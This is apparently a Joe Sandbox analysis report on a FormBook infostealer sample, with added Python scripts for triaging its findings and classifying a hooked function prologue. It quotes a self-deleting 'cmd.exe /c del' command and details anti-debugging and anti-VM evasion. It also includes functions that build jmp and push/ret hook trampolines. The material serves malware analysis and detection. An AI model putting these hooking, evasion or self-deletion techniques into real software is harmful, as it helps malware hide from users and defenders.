          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@6/4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,4_2_002AC5CA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,4_2_002CA0D2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO0_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll2_2_00D81000
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO2_2_00D81000
          Source: RRW9901200241.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RRW9901200241.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RRW9901200241.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\RRW9901200241.exeFile read: C:\Users\user\Desktop\RRW9901200241.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: RRW9901200241.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
          Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: RRW9901200241.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: RRW9901200241.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: RRW9901200241.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: RRW9901200241.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: RRW9901200241.exe; Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D89145 push ecx; ret 0_2_00D89158
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_012FFC06 pushad ; retf 0_2_012FFC25
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0041E3CF push ds; ret 2_2_0041E3D3
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00417CE0 push 403FCDEBh; iretd 2_2_00417D3A
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00417CB6 push 403FCDEBh; iretd 2_2_00417D3A
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0041CEF2 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0041CEFB push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0041CEA5 push eax; ret 2_2_0041CEF8
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0041CF5C push eax; ret 2_2_0041CF62
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00414F86 push edi; ret 2_2_00414F88
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00D89145 push ecx; ret 2_2_00D89158
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0154D0D1 push ecx; ret 2_2_0154D0E4
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_002B76BD push ecx; ret 4_2_002B76D0
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_002B76D1 push ecx; ret 4_2_002B76E4
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_02FED0D1 push ecx; ret 4_2_02FED0E4
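          The findings above are a flat list, one line per observation, which is awkward to reason about when the same memory region (process 4 at 0x370000, process 2 at 0x400000) appears several times under different YARA rule names and the process creations are spread over several lines. The Python script below is an added example written for this page; it is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It assumes a normalised line shape `Source: <origin>; <finding>: <detail>` (the raw export runs the table cells together, so the sample lines embedded in the script are constructed by hand from findings on this page), and it reads the `.sdmp` name fields as `<process index>.<session>.<dump id>.<base address>.<page protection>.<type>`, interpreting the protection field as the Windows PAGE_* constant; that field layout is an assumption about the dump naming scheme, not something this page documents. The script groups rule hits by region, lists the parent/child process lines, flags the `cmd.exe /c del` self-deletion, and counts the anti-debugging primitives (IsDebuggerPresent, OutputDebugStringW, rdtsc, PEB reads via fs:[30h], LdrLoadDll) that the 'Code function' lines in this block and in the evasion block further down exhibit.

```python
"""Triage helper for Joe Sandbox style finding lines (added example for this page)."""
import re
from collections import defaultdict
from typing import Dict, List, NamedTuple, Set, Tuple

# Constructed sample, condensed from findings on this page and normalised to
# "Source: <origin>; <finding>: <detail>". The raw HTML export runs the cells together.
SAMPLE_REPORT = r"""
Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein
Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group
Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23
Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group
Source: unknown; Process created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
Source: C:\Users\user\Desktop\RRW9901200241.exe; Process created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'
Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D91AB3 EncodePointer,LoadLibraryW,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00D91AB3
Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00409A80 rdtsc 2_2_00409A80
Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D869A0 mov eax, dword ptr fs:[00000030h]0_2_00D869A0
"""


class Finding(NamedTuple):
    origin: str   # text between "Source: " and the separator
    kind: str     # e.g. "Matched rule", "Process created", "Code function"
    detail: str   # everything after "<kind>: "


LINE_RE = re.compile(r"^Source:\s*(?P<origin>.*?);\s*(?P<kind>[^:]+):\s*(?P<detail>.*)$")
# Assumed .sdmp field layout: <proc index>.<session>.<dump id>.<base>.<protection>.<type>.sdmp
SDMP_RE = re.compile(r"^(?P<proc>\d{8})\.\d{8}\.\d+\.(?P<base>[0-9A-Fa-f]{16})"
                     r"\.(?P<prot>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$")
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.\d+\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.\d+(?:\.raw)?\.unpack$")
PAGE_EXECUTE_READWRITE = 0x40  # Windows memory protection constant

# Anti-analysis primitives to count in "Code function" lines.
ANTI_ANALYSIS = {
    "IsDebuggerPresent": re.compile(r"\bIsDebuggerPresent\b"),
    "OutputDebugString": re.compile(r"\bOutputDebugString[AW]?\b"),
    "rdtsc": re.compile(r"\brdtsc\b"),
    "PEB via fs:[30h]": re.compile(r"fs:\[0*30h\]", re.IGNORECASE),
    "LdrLoadDll": re.compile(r"\bLdrLoadDll\b"),
}
SELF_DELETE_RE = re.compile(r"cmd\.exe\s+/c\s+del\b", re.IGNORECASE)


def parse_findings(text: str) -> List[Finding]:
    """Turn normalised report lines into Finding records; unparseable lines are skipped."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.append(Finding(m["origin"].strip(), m["kind"].strip(), m["detail"].strip()))
    return out


def region_key(origin: str) -> Tuple:
    """Reduce a dump/unpack name to (process index, base address, protection-or-'unpack')."""
    name = origin.split(",")[0].strip()
    m = SDMP_RE.match(name)
    if m:
        return (int(m["proc"]), int(m["base"], 16), int(m["prot"], 16))
    m = UNPACK_RE.match(name)
    if m:
        return (int(m["proc"]), int(m["base"], 16), "unpack")
    return (None, name, None)


def yara_hits(findings: List[Finding]) -> Dict[Tuple, Set[str]]:
    """Region -> set of rule names (first token of the 'Matched rule' detail)."""
    hits: Dict[Tuple, Set[str]] = defaultdict(set)
    for f in findings:
        if f.kind == "Matched rule":
            hits[region_key(f.origin)].add(f.detail.split()[0])
    return dict(hits)


def executable_regions_with_hits(hits: Dict[Tuple, Set[str]]) -> List[Tuple]:
    """Regions whose (assumed) protection is PAGE_EXECUTE_READWRITE: injected code, not just data."""
    return sorted(k for k in hits if k[2] == PAGE_EXECUTE_READWRITE)


def process_chain(findings: List[Finding]) -> List[Tuple[str, str]]:
    """(parent image, child command line) in report order."""
    return [(f.origin, f.detail) for f in findings if f.kind == "Process created"]


def self_delete_commands(findings: List[Finding]) -> List[str]:
    """Child command lines that delete a file through cmd.exe /c del (self-deletion pattern)."""
    return [cmd for _, cmd in process_chain(findings) if SELF_DELETE_RE.search(cmd)]


def anti_analysis_counts(findings: List[Finding]) -> Dict[str, int]:
    """How many 'Code function' lines reference each anti-analysis primitive."""
    counts = {name: 0 for name in ANTI_ANALYSIS}
    for f in findings:
        if f.kind != "Code function":
            continue
        for name, rx in ANTI_ANALYSIS.items():
            if rx.search(f.detail):
                counts[name] += 1
    return counts


if __name__ == "__main__":
    fs = parse_findings(SAMPLE_REPORT)
    for region, rules in sorted(yara_hits(fs).items(), key=str):
        print("region", region, "rules", sorted(rules))
    for parent, cmd in process_chain(fs):
        print(f"{parent} -> {cmd}")
    print("self-delete:", self_delete_commands(fs))
    print("anti-analysis:", anti_analysis_counts(fs))
```

          Region keys mix integers with the literal 'unpack', so the summary sorts them by their string form. On this report the only hit in an RWX region of the sample's own process is 0x400000 in process 2, which is consistent with the hollowed copy carrying the unpacked FormBook payload while the 0x370000 region in process 4 (cmd.exe) is plain read/write.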

          Hooking and other Techniques for Hiding and Protection:

          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exe; User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
          Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
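          The sandbox reports only the first six bytes it found at user32!PeekMessageA inside explorer.exe (0x48 0x8B 0xB8 0x8E 0xEE 0xE5), and the first question a responder asks is whether those bytes are one of the standard trampolines (jmp rel32, push/ret, mov eax/jmp eax, jmp [mem]) whose target can be read off directly, or a custom rewrite that has to be disassembled by hand. The Python script below is an added example for this page, not part of the Joe Sandbox report or of any Joe Sandbox tooling. It builds the two most common trampolines the way a hooking engine would write them and classifies an observed prologue against the expected one. The expected prologue (8B FF 55 8B EC, the hot-patchable `mov edi,edi; push ebp; mov ebp,esp`) and the function address 0x77A01230 are constructed values for illustration; in a real investigation both come from the on-disk image of the module mapped at its real base, and the hook targets 0x370000 and 0x27D0000 are simply the FormBook regions this report lists reused as sample values. The six reported bytes begin with a REX prefix and match none of the known stubs, so the classifier returns an unrecognised rewrite for them, which is exactly the case that needs manual disassembly.

```python
"""Classify a function prologue observed in memory (added example for this page)."""
import struct
from typing import Dict, Optional

# Constructed baseline: the hot-patchable Win32 prologue mov edi,edi; push ebp; mov ebp,esp.
EXPECTED_PROLOGUE = bytes.fromhex("8bff558bec")
# The six bytes the sandbox reported at user32!PeekMessageA in explorer.exe.
REPORTED_NEW_CODE = bytes.fromhex("488bb88eeee5")
FUNC_ADDR = 0x77A01230  # constructed address of the hooked function


def jmp_rel32_stub(func_addr: int, target: int) -> bytes:
    """E9 <rel32>: relative jump from func_addr to target; rel32 is measured from the next instruction."""
    rel = target - (func_addr + 5)
    if not -(1 << 31) <= rel < (1 << 31):
        raise ValueError("target not reachable with a rel32 jump")
    return b"\xe9" + struct.pack("<i", rel)


def push_ret_stub(target: int) -> bytes:
    """68 <imm32> C3: push absolute address, ret (only meaningful in 32-bit processes)."""
    return b"\x68" + struct.pack("<I", target) + b"\xc3"


def classify_prologue(expected: bytes, observed: bytes, func_addr: int,
                      bits: int = 32) -> Dict[str, Optional[object]]:
    """Compare observed bytes with the expected prologue and name the trampoline if it is a known one."""
    n = min(len(expected), len(observed))
    if n and observed[:n] == expected[:n]:
        return {"hooked": False, "style": "intact", "target": None}
    mask = (1 << bits) - 1
    b = observed
    result: Dict[str, Optional[object]] = {"hooked": True, "style": "unrecognised rewrite", "target": None}
    if len(b) >= 5 and b[0] == 0xE9:                               # jmp rel32
        rel = struct.unpack_from("<i", b, 1)[0]
        result.update(style="jmp rel32", target=(func_addr + 5 + rel) & mask)
    elif len(b) >= 6 and b[0] == 0x68 and b[5] == 0xC3:            # push imm32; ret
        result.update(style="push/ret", target=struct.unpack_from("<I", b, 1)[0])
    elif len(b) >= 7 and b[0] == 0xB8 and b[5:7] == b"\xff\xe0":   # mov eax, imm32; jmp eax
        result.update(style="mov eax/jmp eax", target=struct.unpack_from("<I", b, 1)[0])
    elif len(b) >= 6 and b[:2] == b"\xff\x25":                     # jmp [mem]: pointer lives in memory
        result.update(style="jmp [mem] (indirect; read the pointer from memory)")
    return result


if __name__ == "__main__":
    for label, observed in [
        ("intact", EXPECTED_PROLOGUE),
        ("reported", REPORTED_NEW_CODE),
        ("jmp rel32", jmp_rel32_stub(FUNC_ADDR, 0x370000)),
        ("push/ret", push_ret_stub(0x27D0000)),
    ]:
        r = classify_prologue(EXPECTED_PROLOGUE, observed, FUNC_ADDR)
        tgt = "" if r["target"] is None else f" -> {r['target']:#x}"
        print(f"{label:10s} {observed.hex()}: {r['style']}{tgt}")
```

          The comparison deliberately checks only the bytes the sandbox managed to read, and the target of an indirect jmp is not resolved because it requires a second read of the process memory. For a 64-bit process such as this explorer.exe pass bits=64 so the rel32 arithmetic is not truncated to 32 bits.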

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\RRW9901200241.exe; RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exe; RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe; RDTSC instruction interceptor: First address: 00000000027D98E4 second address: 00000000027D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exe; RDTSC instruction interceptor: First address: 00000000027D9B4E second address: 00000000027D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Windows\explorer.exe TID: 1040; Thread sleep count: 49 > 30
          Source: C:\Windows\explorer.exe TID: 1040; Thread sleep time: -98000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4868; Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\explorer.exe; Last function: Thread delayed
          Source: C:\Windows\explorer.exe; Last function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,4_2_002B245C
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,4_2_002B68BA
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,4_2_002AB89C
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_002A85EA
          Source: C:\Windows\SysWOW64\cmd.exe; Code function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,4_2_002C31DC
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmp; Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.368126601.0000000008662000.00000004.00000001.sdmp; Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.691817008.00000000062E0000.00000004.00000001.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmp; Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exe; Process queried: DebugPort
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_00409A80 rdtsc 2_2_00409A80
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D889BC _memset,IsDebuggerPresent,0_2_00D889BC
          Source: C:\Users\user\Desktop\RRW9901200241.exe; Code function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00D91AB3
